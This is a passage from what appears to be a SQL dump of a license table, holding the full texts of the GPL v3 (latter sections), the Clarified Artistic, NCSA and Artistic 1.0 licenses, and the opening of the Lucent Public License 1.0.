modifies\nthe requirement in section 4 to \"keep intact all notices\".\n\nc) You must license the entire work, as a whole, under this License to anyone\nwho comes into possession of a copy. This License will therefore apply, along\nwith any applicable section 7 additional terms, to the whole of the work,\nand all its parts, regardless of how they are packaged. This License gives\nno permission to license the work in any other way, but it does not invalidate\nsuch permission if you have separately received it.\n\nd) If the work has interactive user interfaces, each must display Appropriate\nLegal Notices; however, if the Program has interactive interfaces that do\nnot display Appropriate Legal Notices, your work need not make them do so.\n\nA compilation of a covered work with other separate and independent works,\nwhich are not by their nature extensions of the covered work, and which are\nnot combined with it such as to form a larger program, in or on a volume of\na storage or distribution medium, is called an \"aggregate\" if the compilation\nand its resulting copyright are not used to limit the access or legal rights\nof the compilation\'s users beyond what the individual works permit. Inclusion\nof a covered work in an aggregate does not cause this License to apply to\nthe other parts of the aggregate.\n\n 6. Conveying Non-Source Forms.\n\nYou may convey a covered work in object code form under the terms of sections\n4 and 5, provided that you also convey the machine-readable Corresponding\nSource under the terms of this License, in one of these ways:\n\na) Convey the object code in, or embodied in, a physical product (including\na physical distribution medium), accompanied by the Corresponding Source fixed\non a durable physical medium customarily used for software interchange.\n\nb) Convey the object code in, or embodied in, a physical product (including\na physical distribution medium), accompanied by a written offer, valid for\nat least three years and valid for as long as you offer spare parts or customer\nsupport for that product model, to give anyone who possesses the object code\neither (1) a copy of the Corresponding Source for all the software in the\nproduct that is covered by this License, on a durable physical medium customarily\nused for software interchange, for a price no more than your reasonable cost\nof physically performing this conveying of source, or (2) access to copy the\nCorresponding Source from a network server at no charge.\n\nc) Convey individual copies of the object code with a copy of the written\noffer to provide the Corresponding Source. This alternative is allowed only\noccasionally and noncommercially, and only if you received the object code\nwith such an offer, in accord with subsection 6b.\n\nd) Convey the object code by offering access from a designated place (gratis\nor for a charge), and offer equivalent access to the Corresponding Source\nin the same way through the same place at no further charge. You need not\nrequire recipients to copy the Corresponding Source along with the object\ncode. If the place to copy the object code is a network server, the Corresponding\nSource may be on a different server (operated by you or a third party) that\nsupports equivalent copying facilities, provided you maintain clear directions\nnext to the object code saying where to find the Corresponding Source. Regardless\nof what server hosts the Corresponding Source, you remain obligated to ensure\nthat it is available for as long as needed to satisfy these requirements.\n\ne) Convey the object code using peer-to-peer transmission, provided you inform\nother peers where the object code and Corresponding Source of the work are\nbeing offered to the general public at no charge under subsection 6d.\n\nA separable portion of the object code, whose source code is excluded from\nthe Corresponding Source as a System Library, need not be included in conveying\nthe object code work.\n\nA \"User Product\" is either (1) a \"consumer product\", which means any tangible\npersonal property which is normally used for personal, family, or household\npurposes, or (2) anything designed or sold for incorporation into a dwelling.\nIn determining whether a product is a consumer product, doubtful cases shall\nbe resolved in favor of coverage. For a particular product received by a particular\nuser, \"normally used\" refers to a typical or common use of that class of product,\nregardless of the status of the particular user or of the way in which the\nparticular user actually uses, or expects or is expected to use, the product.\nA product is a consumer product regardless of whether the product has substantial\ncommercial, industrial or non-consumer uses, unless such uses represent the\nonly significant mode of use of the product.\n\n\"Installation Information\" for a User Product means any methods, procedures,\nauthorization keys, or other information required to install and execute modified\nversions of a covered work in that User Product from a modified version of\nits Corresponding Source. The information must suffice to ensure that the\ncontinued functioning of the modified object code is in no case prevented\nor interfered with solely because modification has been made.\n\nIf you convey an object code work under this section in, or with, or specifically\nfor use in, a User Product, and the conveying occurs as part of a transaction\nin which the right of possession and use of the User Product is transferred\nto the recipient in perpetuity or for a fixed term (regardless of how the\ntransaction is characterized), the Corresponding Source conveyed under this\nsection must be accompanied by the Installation Information. But this requirement\ndoes not apply if neither you nor any third party retains the ability to install\nmodified object code on the User Product (for example, the work has been installed\nin ROM).\n\nThe requirement to provide Installation Information does not include a requirement\nto continue to provide support service, warranty, or updates for a work that\nhas been modified or installed by the recipient, or for the User Product in\nwhich it has been modified or installed. Access to a network may be denied\nwhen the modification itself materially and adversely affects the operation\nof the network or violates the rules and protocols for communication across\nthe network.\n\nCorresponding Source conveyed, and Installation Information provided, in accord\nwith this section must be in a format that is publicly documented (and with\nan implementation available to the public in source code form), and must require\nno special password or key for unpacking, reading or copying.\n\n 7. Additional Terms.\n\n\"Additional permissions\" are terms that supplement the terms of this License\nby making exceptions from one or more of its conditions. Additional permissions\nthat are applicable to the entire Program shall be treated as though they\nwere included in this License, to the extent that they are valid under applicable\nlaw. If additional permissions apply only to part of the Program, that part\nmay be used separately under those permissions, but the entire Program remains\ngoverned by this License without regard to the additional permissions.\n\nWhen you convey a copy of a covered work, you may at your option remove any\nadditional permissions from that copy, or from any part of it. (Additional\npermissions may be written to require their own removal in certain cases when\nyou modify the work.) You may place additional permissions on material, added\nby you to a covered work, for which you have or can give appropriate copyright\npermission.\n\nNotwithstanding any other provision of this License, for material you add\nto a covered work, you may (if authorized by the copyright holders of that\nmaterial) supplement the terms of this License with terms:\n\na) Disclaiming warranty or limiting liability differently from the terms of\nsections 15 and 16 of this License; or\n\nb) Requiring preservation of specified reasonable legal notices or author\nattributions in that material or in the Appropriate Legal Notices displayed\nby works containing it; or\n\nc) Prohibiting misrepresentation of the origin of that material, or requiring\nthat modified versions of such material be marked in reasonable ways as different\nfrom the original version; or\n\nd) Limiting the use for publicity purposes of names of licensors or authors\nof the material; or\n\ne) Declining to grant rights under trademark law for use of some trade names,\ntrademarks, or service marks; or\n\nf) Requiring indemnification of licensors and authors of that material by\nanyone who conveys the material (or modified versions of it) with contractual\nassumptions of liability to the recipient, for any liability that these contractual\nassumptions directly impose on those licensors and authors.\n\nAll other non-permissive additional terms are considered \"further restrictions\"\nwithin the meaning of section 10. If the Program as you received it, or any\npart of it, contains a notice stating that it is governed by this License\nalong with a term that is a further restriction, you may remove that term.\nIf a license document contains a further restriction but permits relicensing\nor conveying under this License, you may add to a covered work material governed\nby the terms of that license document, provided that the further restriction\ndoes not survive such relicensing or conveying.\n\nIf you add terms to a covered work in accord with this section, you must place,\nin the relevant source files, a statement of the additional terms that apply\nto those files, or a notice indicating where to find the applicable terms.\n\nAdditional terms, permissive or non-permissive, may be stated in the form\nof a separately written license, or stated as exceptions; the above requirements\napply either way.\n\n 8. Termination.\n\nYou may not propagate or modify a covered work except as expressly provided\nunder this License. Any attempt otherwise to propagate or modify it is void,\nand will automatically terminate your rights under this License (including\nany patent licenses granted under the third paragraph of section 11).\n\nHowever, if you cease all violation of this License, then your license from\na particular copyright holder is reinstated (a) provisionally, unless and\nuntil the copyright holder explicitly and finally terminates your license,\nand (b) permanently, if the copyright holder fails to notify you of the violation\nby some reasonable means prior to 60 days after the cessation.\n\nMoreover, your license from a particular copyright holder is reinstated permanently\nif the copyright holder notifies you of the violation by some reasonable means,\nthis is the first time you have received notice of violation of this License\n(for any work) from that copyright holder, and you cure the violation prior\nto 30 days after your receipt of the notice.\n\nTermination of your rights under this section does not terminate the licenses\nof parties who have received copies or rights from you under this License.\nIf your rights have been terminated and not permanently reinstated, you do\nnot qualify to receive new licenses for the same material under section 10.\n\n 9. Acceptance Not Required for Having Copies.\n\nYou are not required to accept this License in order to receive or run a copy\nof the Program. Ancillary propagation of a covered work occurring solely as\na consequence of using peer-to-peer transmission to receive a copy likewise\ndoes not require acceptance. However, nothing other than this License grants\nyou permission to propagate or modify any covered work. These actions infringe\ncopyright if you do not accept this License. Therefore, by modifying or propagating\na covered work, you indicate your acceptance of this License to do so.\n\n 10. Automatic Licensing of Downstream Recipients.\n\nEach time you convey a covered work, the recipient automatically receives\na license from the original licensors, to run, modify and propagate that work,\nsubject to this License. You are not responsible for enforcing compliance\nby third parties with this License.\n\nAn \"entity transaction\" is a transaction transferring control of an organization,\nor substantially all assets of one, or subdividing an organization, or merging\norganizations. If propagation of a covered work results from an entity transaction,\neach party to that transaction who receives a copy of the work also receives\nwhatever licenses to the work the party\'s predecessor in interest had or could\ngive under the previous paragraph, plus a right to possession of the Corresponding\nSource of the work from the predecessor in interest, if the predecessor has\nit or can get it with reasonable efforts.\n\nYou may not impose any further restrictions on the exercise of the rights\ngranted or affirmed under this License. For example, you may not impose a\nlicense fee, royalty, or other charge for exercise of rights granted under\nthis License, and you may not initiate litigation (including a cross-claim\nor counterclaim in a lawsuit) alleging that any patent claim is infringed\nby making, using, selling, offering for sale, or importing the Program or\nany portion of it.\n\n 11. Patents.\n\nA \"contributor\" is a copyright holder who authorizes use under this License\nof the Program or a work on which the Program is based. The work thus licensed\nis called the contributor\'s \"contributor version\".\n\nA contributor\'s \"essential patent claims\" are all patent claims owned or controlled\nby the contributor, whether already acquired or hereafter acquired, that would\nbe infringed by some manner, permitted by this License, of making, using,\nor selling its contributor version, but do not include claims that would be\ninfringed only as a consequence of further modification of the contributor\nversion. For purposes of this definition, \"control\" includes the right to\ngrant patent sublicenses in a manner consistent with the requirements of this\nLicense.\n\nEach contributor grants you a non-exclusive, worldwide, royalty-free patent\nlicense under the contributor\'s essential patent claims, to make, use, sell,\noffer for sale, import and otherwise run, modify and propagate the contents\nof its contributor version.\n\nIn the following three paragraphs, a \"patent license\" is any express agreement\nor commitment, however denominated, not to enforce a patent (such as an express\npermission to practice a patent or covenant not to sue for patent infringement).\nTo \"grant\" such a patent license to a party means to make such an agreement\nor commitment not to enforce a patent against the party.\n\nIf you convey a covered work, knowingly relying on a patent license, and the\nCorresponding Source of the work is not available for anyone to copy, free\nof charge and under the terms of this License, through a publicly available\nnetwork server or other readily accessible means, then you must either (1)\ncause the Corresponding Source to be so available, or (2) arrange to deprive\nyourself of the benefit of the patent license for this particular work, or\n(3) arrange, in a manner consistent with the requirements of this License,\nto extend the patent license to downstream recipients. \"Knowingly relying\"\nmeans you have actual knowledge that, but for the patent license, your conveying\nthe covered work in a country, or your recipient\'s use of the covered work\nin a country, would infringe one or more identifiable patents in that country\nthat you have reason to believe are valid.\n\nIf, pursuant to or in connection with a single transaction or arrangement,\nyou convey, or propagate by procuring conveyance of, a covered work, and grant\na patent license to some of the parties receiving the covered work authorizing\nthem to use, propagate, modify or convey a specific copy of the covered work,\nthen the patent license you grant is automatically extended to all recipients\nof the covered work and works based on it.\n\nA patent license is \"discriminatory\" if it does not include within the scope\nof its coverage, prohibits the exercise of, or is conditioned on the non-exercise\nof one or more of the rights that are specifically granted under this License.\nYou may not convey a covered work if you are a party to an arrangement with\na third party that is in the business of distributing software, under which\nyou make payment to the third party based on the extent of your activity of\nconveying the work, and under which the third party grants, to any of the\nparties who would receive the covered work from you, a discriminatory patent\nlicense (a) in connection with copies of the covered work conveyed by you\n(or copies made from those copies), or (b) primarily for and in connection\nwith specific products or compilations that contain the covered work, unless\nyou entered into that arrangement, or that patent license was granted, prior\nto 28 March 2007.\n\nNothing in this License shall be construed as excluding or limiting any implied\nlicense or other defenses to infringement that may otherwise be available\nto you under applicable patent law.\n\n 12. No Surrender of Others\' Freedom.\n\nIf conditions are imposed on you (whether by court order, agreement or otherwise)\nthat contradict the conditions of this License, they do not excuse you from\nthe conditions of this License. If you cannot convey a covered work so as\nto satisfy simultaneously your obligations under this License and any other\npertinent obligations, then as a consequence you may not convey it at all.\nFor example, if you agree to terms that obligate you to collect a royalty\nfor further conveying from those to whom you convey the Program, the only\nway you could satisfy both those terms and this License would be to refrain\nentirely from conveying the Program.\n\n 13. Use with the GNU Affero General Public License.\n\nNotwithstanding any other provision of this License, you have permission to\nlink or combine any covered work with a work licensed under version 3 of the\nGNU Affero General Public License into a single combined work, and to convey\nthe resulting work. The terms of this License will continue to apply to the\npart which is the covered work, but the special requirements of the GNU Affero\nGeneral Public License, section 13, concerning interaction through a network\nwill apply to the combination as such.\n\n 14. Revised Versions of this License.\n\nThe Free Software Foundation may publish revised and/or new versions of the\nGNU General Public License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns.\n\nEach version is given a distinguishing version number. If the Program specifies\nthat a certain numbered version of the GNU General Public License \"or any\nlater version\" applies to it, you have the option of following the terms and\nconditions either of that numbered version or of any later version published\nby the Free Software Foundation. If the Program does not specify a version\nnumber of the GNU General Public License, you may choose any version ever\npublished by the Free Software Foundation.\n\nIf the Program specifies that a proxy can decide which future versions of\nthe GNU General Public License can be used, that proxy\'s public statement\nof acceptance of a version permanently authorizes you to choose that version\nfor the Program.\n\nLater license versions may give you additional or different permissions. However,\nno additional obligations are imposed on any author or copyright holder as\na result of your choosing to follow a later version.\n\n 15. Disclaimer of Warranty.\n\nTHERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE\nLAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR\nOTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER\nEXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM\nPROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR\nCORRECTION.\n\n 16. Limitation of Liability.\n\nIN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL\nANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM\nAS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL,\nINCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO\nUSE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED\nINACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE\nPROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER\nPARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 17. Interpretation of Sections 15 and 16.\n\nIf the disclaimer of warranty and limitation of liability provided above cannot\nbe given local legal effect according to their terms, reviewing courts shall\napply local law that most closely approximates an absolute waiver of all civil\nliability in connection with the Program, unless a warranty or assumption\nof liability accompanies a copy of the Program in return for a fee. END OF\nTERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Programs\n\nIf you develop a new program, and you want it to be of the greatest possible\nuse to the public, the best way to achieve this is to make it free software\nwhich everyone can redistribute and change under these terms.\n\nTo do so, attach the following notices to the program. It is safest to attach\nthem to the start of each source file to most effectively state the exclusion\nof warranty; and each file should have at least the \"copyright\" line and a\npointer to where the full notice is found.\n\n<one line to give the program\'s name and a brief idea of what it does.>\n\nCopyright (C) <year> <name of author>\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation, either version 3 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with\nthis program. If not, see <http s ://www.gnu.org/licenses/>.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program does terminal interaction, make it output a short notice like\nthis when it starts in an interactive mode:\n\n<program> Copyright (C) <year> <name of author>\n\nThis program comes with ABSOLUTELY NO WARRANTY; for details type `show w\'.\n\nThis is free software, and you are welcome to redistribute it under certain\nconditions; type `show c\' for details.\n\nThe hypothetical commands `show w\' and `show c\' should show the appropriate\nparts of the General Public License. Of course, your program\'s commands might\nbe different; for a GUI interface, you would use an \"about box\".\n\nYou should also get your employer (if you work as a programmer) or school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary. For\nmore information on this, and how to apply and follow the GNU GPL, see <http\ns ://www.gnu.org/licenses/>.\n\nThe GNU General Public License does not permit incorporating your program\ninto proprietary programs. If your program is a subroutine library, you may\nconsider it more useful to permit linking proprietary applications with the\nlibrary. If this is what you want to do, use the GNU Lesser General Public\nLicense instead of this License. But first, please read <http s ://www.gnu.org/\nlicenses /why-not-lgpl.html>.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(137,'ClArtistic','The Clarified Artistic License\n\nPreamble\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder as\nspecified below.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Distribution fee\" is a fee you charge for providing a copy of this Package\nto another party.\n\n\"Freely Available\" means that no fee is charged for the right to use the item,\nthough there may be fees involved in handling the item. It also means that\nrecipients of the item may redistribute it under the same conditions they\nreceived it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain, or those made Freely Available, or from the Copyright\nHolder. A Package modified in such a way shall still be considered the Standard\nVersion.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or placing the modifications on a major network archive site allowing\nunrestricted access to them, or by allowing the Copyright Holder to include\nyour modifications in the Standard Version of the Package.\n\n b) use the modified Package only within your corporation or organization.\n\nc) rename any non-standard executables so the names do not conflict with standard\nexecutables, which must also be provided, and provide a separate manual page\nfor each non-standard executable that clearly documents how it differs from\nthe Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\ne) permit and encourge anyone who receives a copy of the modified Package\npermission to make your modifications Freely Available in some specific way.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least ONE of the following:\n\na) distribute a Standard Version of the executables and library files, together\nwith instructions (in the manual page or equivalent) on where to get the Standard\nVersion.\n\nb) accompany the distribution with the machine-readable source of the Package\nwith your modifications.\n\nc) give non-standard executables non-standard names, and clearly document\nthe differences in manual pages (or equivalent), together with instructions\non where to get the Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\ne) offer the machine-readable source of the Package, with your modifications,\nby mail order.\n\n5. You may charge a distribution fee for any distribution of this Package.\nIf you offer support for this Package, you may charge any fee you choose for\nthat support. You may not charge a license fee for the right to use this Package\nitself. You may distribute this Package in aggregate with other (possibly\ncommercial and possibly nonfree) programs as part of a larger (possibly commercial\nand possibly nonfree) software distribution, and charge license fees for other\nparts of that software distribution, provided that you do not advertise this\nPackage as a product of your own. If the Package includes an interpreter,\nYou may embed this Package\'s interpreter within an executable of yours (by\nlinking); this shall be construed as a mere form of aggregation, provided\nthat the complete Standard Version of the interpreter is so embedded.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whoever generated them, and may be sold commercially,\nand may be aggregated with this Package. If such scripts or library files\nare aggregated with this Package via the so-called \"undump\" or \"unexec\" methods\nof producing a binary executable image, then distribution of such an image\nshall neither be construed as a distribution of this Package nor shall it\nfall under the restrictions of Paragraphs 3 and 4, provided that you do not\nrepresent such an executable image as a Standard Version of this Package.\n\n7. C subroutines (or comparably compiled subroutines in other languages) supplied\nby you and linked into this Package in order to emulate subroutines and variables\nof the language defined by this Package shall not be considered part of this\nPackage, but are the equivalent of input as in Paragraph 6, provided these\nsubroutines do not change the language in any way that would cause it to fail\nthe regression tests for the language.\n\n8. Aggregation of the Standard Version of the Package with a commercial distribution\nis always permitted provided that the use of this Package is embedded; that\nis, when no overt attempt is made to make this Package\'s interfaces visible\nto the end user of the commercial distribution. Such use shall not be construed\nas a distribution of this Package.\n\n9. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n10. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(138,'NCSA','University of Illinois/NCSA Open Source License\n\nCopyright (c) <Year> <Owner Organization Name> . All rights reserved.\n\nDeveloped by: \n\n<Name of Development Group>\n\n<Name of Institution>\n\n<URL for Development Group/Institution>\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nwith the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimers.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimers in the documentation\nand/or other materials provided with the distribution.\n\n* Neither the names of <Name of Development Group, Name of Institution> ,\nnor the names of its contributors may be used to endorse or promote products\nderived from this Software without specific prior written permission.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE CONTRIBUTORS\nOR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF\nOR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(139,'Artistic-1.0','The Artistic License\n\nPreamble\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Reasonable copying fee\" is whatever you can justify on the basis of media\ncost, duplication charges, time of people involved, and so on. (You will not\nbe required to justify it to the Copyright Holder, but only to the computing\ncommunity at large as a market that must bear the fee.)\n\n\"Freely Available\" means that no fee is charged for the item itself, though\nthere may be fees involved in handling the item. It also means that recipients\nof the item may redistribute it under the same conditions they received it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain or from the Copyright Holder. A Package modified in\nsuch a way shall still be considered the Standard Version.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or placing the modifications on a major archive site such as ftp.uu.net,\nor by allowing the Copyright Holder to include your modifications in the Standard\nVersion of the Package.\n\n b) use the modified Package only within your corporation or organization.\n\nc) rename any non-standard executables so the names do not conflict with standard\nexecutables, which must also be provided, and provide a separate manual page\nfor each non-standard executable that clearly documents how it differs from\nthe Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least ONE of the following:\n\na) distribute a Standard Version of the executables and library files, together\nwith instructions (in the manual page or equivalent) on where to get the Standard\nVersion.\n\nb) accompany the distribution with the machine-readable source of the Package\nwith your modifications.\n\nc) accompany any non-standard executables with their corresponding Standard\nVersion executables, giving the non-standard executables non-standard names,\nand clearly documenting the differences in manual pages (or equivalent), together\nwith instructions on where to get the Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n5. You may charge a reasonable copying fee for any distribution of this Package.\nYou may charge any fee you choose for support of this Package. You may not\ncharge a fee for this Package itself. However, you may distribute this Package\nin aggregate with other (possibly commercial) programs as part of a larger\n(possibly commercial) software distribution provided that you do not advertise\nthis Package as a product of your own.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whomever generated them, and may be sold commercially,\nand may be aggregated with this Package.\n\n7. C or perl subroutines supplied by you and linked into this Package shall\nnot be considered part of this Package.\n\n8. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n9. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(140,'LPL-1.0','Lucent Public License Version 1.0\n\nTHE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS PUBLIC LICENSE\n(\"AGREEMENT\"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM CONSTITUTES\nRECIPIENT\'S ACCEPTANCE OF THIS AGREEMENT.\n\n 1. DEFINITIONS\n\n \"Contribution\" means:\n\n a. in the case of <ORGANIZATION> (\" <OWNER> \"), the Original Program, and\n\n b. in the case of each Contributor,\n\n i. changes to the Program, and\n\nii. additions to the Program; where such changes and/or additions to the Program\noriginate from and are \"Contributed\" by that particular Contributor.\n\nA Contribution is \"Contributed\" by a Contributor only (i) if it was added\nto the Program by such Contributor itself or anyone acting on such Contributor\'s\nbehalf, and (ii) the Contributor explicitly consents, in accordance with Section\n3C, to characterization of the changes and/or additions as Contributions.\nContributions do not include additions to the Program which: (i) are separate\nmodules of software distributed in conjunction with the Program under their\nown license agreement, and (ii) are not derivative works of the Program.\n\n\"Contributor\" means <OWNER> and any other entity that has Contributed a Contribution\nto the Program.\n\n\"Distributor\" means a Recipient that distributes the Program, modifications\nto the Program, or any part thereof.\n\n\"Licensed Patents\" mean patent claims licensable by a Contributor which are\nnecessarily infringed by the use or sale of its Contribution alone or when\ncombined with the Program.\n\n\"Original Program\" means the original version of the software accompanying\nthis Agreement as released by <OWNER> , including source code, object code\nand documentation, if any.\n\n\"Program\" means the Original Program and Contributions or any part thereof\n\n\"Recipient\" means anyone who receives the Program under this Agreement, including\nall Contributors.\n\n 2. GRANT OF RIGHTS\n\na. Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free copyright license to reproduce,\nprepare derivative works of, publicly display, publicly perform, distribute\nand sublicense the Contribution of such Contributor, if any, and such derivative\nworks, in source code and object code form.\n\nb. Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free patent license under Licensed\nPatents to make, use, sell, offer to sell, import and otherwise transfer the\nContribution of such Contributor, if any, in source code and object code form.\nThe patent license granted by a Contributor shall also apply to the combination\nof the Contribution of that Contributor and the Program if, at the time the\nContribution is added by the Contributor, such addition of the Contribution\ncauses such combination to be covered by the Licensed Patents. The patent\nlicense granted by a Contributor shall not apply to (i) any other combinations\nwhich include the Contribution, nor to (ii) Contributions of other Contributors.\nNo hardware per se is licensed hereunder.\n\nc. Recipient understands that although each Contributor grants the licenses\nto its Contributions set forth herein, no assurances are provided by any Contributor\nthat the Program does not infringe the patent or other intellectual property\nrights of any other entity. Each Contributor disclaims any liability to Recipient\nfor claims brought by any other entity based on infringement of intellectual\nproperty rights or otherwise. As a condition to exercising the rights and\nlicenses granted hereunder, each Recipient hereby assumes sole responsibility\nto secure any other intellectual property rights needed, if any. For example,\nif a third party patent license is required to allow Recipient to distribute\nthe Program, it is Recipient\'s responsibility to acquire that license before\ndistributing the Program.\n\nd. Each Contributor represents that to its knowledge it has sufficient copyright\nrights in its Contribution, if any, to grant the copyright license set forth\nin this Agreement.\n\n 3. REQUIREMENTS\n\nA. Distributor may choose to distribute the Program in any form under this\nAgreement or under its own license agreement, provided that:\n\n 1. it complies with the terms and conditions of this Agreement;\n\n2. if the Program is distributed in source code or other tangible form, a\ncopy of this Agreement or Distributor\'s own license agreement is included\nwith each copy of the Program; and\n\n3. if distributed under Distributor\'s own license agreement, such license\nagreement:\n\na. effectively disclaims on behalf of all Contributors all warranties and\nconditions, express and implied, including warranties or conditions of title\nand non-infringement, and implied warranties or conditions of merchantability\nand fitness for a particular purpose;\n\nb. effectively excludes on behalf of all Contributors all liability for damages,\nincluding direct, indirect, special, incidental and consequential damages,\nsuch as lost profits; and\n\nc. states that any provisions which differ from this Agreement are offered\nby that Contributor alone and not by any other party.\n\nB. Each Distributor must include the following in a conspicuous location in\nthe Program:\n\n Copyright (C) <YEAR>, <ORGANIZATION> and others. All Rights Reserved.\n\nC. In addition, each Contributor must identify itself as the originator of\nits Contribution, if any, and indicate its consent to characterization of\nits additions and/or changes as a Contribution, in a manner that reasonably\nallows subsequent Recipients to identify the originator of the Contribution.\nOnce consent is granted, it may not thereafter be revoked.\n\n 4. COMMERCIAL DISTRIBUTION\n\nCommercial distributors of software may accept 